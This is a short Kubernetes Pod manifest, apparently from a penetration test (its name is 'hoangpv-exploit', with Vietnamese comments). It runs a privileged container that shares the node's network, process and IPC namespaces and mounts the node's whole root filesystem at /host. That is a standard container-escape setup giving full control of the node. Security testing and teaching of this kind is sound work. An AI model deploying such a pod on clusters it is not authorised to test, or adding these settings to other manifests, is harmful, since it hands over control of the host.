apiVersion: v1
kind: Pod
metadata:
  name: hoangpv-exploit
  labels:
    app: pentest
spec:
  hostNetwork: true # sử dụng mạng chung với Node
  hostPID: true # xem và tương tác với các tiến trình trên Node
  hostIPC: true # giao tiếp với các tiến trình trên Node
  containers:
  - name: hoangpv-exploit
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
